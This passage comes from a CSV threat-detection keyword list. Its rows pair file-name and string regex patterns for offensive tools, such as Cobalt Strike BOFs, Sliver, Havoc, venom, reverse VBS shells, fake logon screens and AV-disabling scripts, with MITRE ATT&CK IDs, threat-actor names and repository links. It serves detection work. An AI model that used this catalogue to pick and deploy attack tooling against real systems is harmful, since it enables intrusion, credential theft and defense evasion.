Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","35923"
"*bin/bof_nim.o*",".{0,1000}bin\/bof_nim\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","35924"
"*bin/dll/merlin.c*",".{0,1000}bin\/dll\/merlin\.c.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","35925"
"*bin/GoAWSConsoleSpray*",".{0,1000}bin\/GoAWSConsoleSpray.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","35926"
"*bin/icmpsh/*",".{0,1000}bin\/icmpsh\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35927"
"*bin/iodine*",".{0,1000}bin\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","35928"
"*bin/LastenPIC.bin*",".{0,1000}bin\/LastenPIC\.bin.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#content","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","35929"
"*bin/ldd2pretty*",".{0,1000}bin\/ldd2pretty.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","35930"
"*bin/ligolo*",".{0,1000}bin\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","35931"
"*bin/localrelay*",".{0,1000}bin\/localrelay.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","35932"
"*bin/masscan*",".{0,1000}bin\/masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","35934"
"*bin/merlinAgent*",".{0,1000}bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","35935"
"*bin/PELoader.exe*",".{0,1000}bin\/PELoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","35936"
"*bin/setoolkit*",".{0,1000}bin\/setoolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","35937"
"*bin/setuserpass.x64*",".{0,1000}bin\/setuserpass\.x64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","35938"
"*bin/SillyRAT/*",".{0,1000}bin\/SillyRAT\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35939"
"*bin/stardust.x64.bin*",".{0,1000}bin\/stardust\.x64\.bin.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","35940"
"*bin/striker*",".{0,1000}bin\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","35941"
"*bin/tun2socks*",".{0,1000}bin\/tun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35943"
"*bin/void.zip*",".{0,1000}bin\/void\.zip.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35944"
"*Bin\bin32\zlibwapi.dll*",".{0,1000}Bin\\bin32\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","35946"
"*Bin\bin64\zlibwapi.dll*",".{0,1000}Bin\\bin64\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","35947"
"*bin\psexec_command.x64.o*",".{0,1000}bin\\psexec_command\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","35948"
"*bin\SillyRAT*",".{0,1000}bin\\SillyRAT.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35950"
"*bin\void.zip*",".{0,1000}bin\\void\.zip.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35951"
"*bin2mac.py *.bin*",".{0,1000}bin2mac\.py\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","35954"
"*Binary-Offensive/ProtectMyTooling*",".{0,1000}Binary\-Offensive\/ProtectMyTooling.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","35955"
"*BinaryToVbaFunc(*",".{0,1000}BinaryToVbaFunc\(.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","35956"
"*binderlabs/DirCreate2System*",".{0,1000}binderlabs\/DirCreate2System.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","35957"
"*binderlabs/DirCreate2System*",".{0,1000}binderlabs\/DirCreate2System.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","35958"
"*Binedx765ance Chaedx765in Waledx765let*",".{0,1000}Binedx765ance\sChaedx765in\sWaledx765let.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","35959"
"*binwalk -e image.png*",".{0,1000}binwalk\s\-e\simage\.png.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","35960"
"*BishopFox/sliver*",".{0,1000}BishopFox\/sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35961"
"*bitb_server/phishing.ini*",".{0,1000}bitb_server\/phishing\.ini.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","35963"
"*bitcoin2john.py*",".{0,1000}bitcoin2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35964"
"*Bitdefender-DisableAV-Remote.bat*",".{0,1000}Bitdefender\-DisableAV\-Remote\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","tool used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35965"
"*Bitmap-Elevate*",".{0,1000}Bitmap\-Elevate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","35988"
"*bitquark_top100k_sublist.txt*",".{0,1000}bitquark_top100k_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","35989"
"*bits_ntlm_token_impersonation.*",".{0,1000}bits_ntlm_token_impersonation\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","35990"
"*bitsadmin/fakelogonscreen*",".{0,1000}bitsadmin\/fakelogonscreen.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","35993"
"*bitsadmin/nopowershell*",".{0,1000}bitsadmin\/nopowershell.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","35994"
"*bitsadmin/revbshell*",".{0,1000}bitsadmin\/revbshell.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","1","N/A","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","35995"
"*BitsadminStager*",".{0,1000}BitsadminStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","35996"
"*bitshares2john.py*",".{0,1000}bitshares2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35997"
"*bitwarden2john.py*",".{0,1000}bitwarden2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35998"
"*Biu-framework*",".{0,1000}Biu\-framework.{0,1000}","offensive_tool_keyword","Biu-framework","Biu-framework Security Scan Framework For Enterprise Intranet Based Services","T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Framework","https://awesomeopensource.com/project/0xbug/Biu-framework","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35999"
"*bkerberos_ccache_use*",".{0,1000}bkerberos_ccache_use.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36002"
"*bkerberos_ticket_purge*",".{0,1000}bkerberos_ticket_purge.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36003"
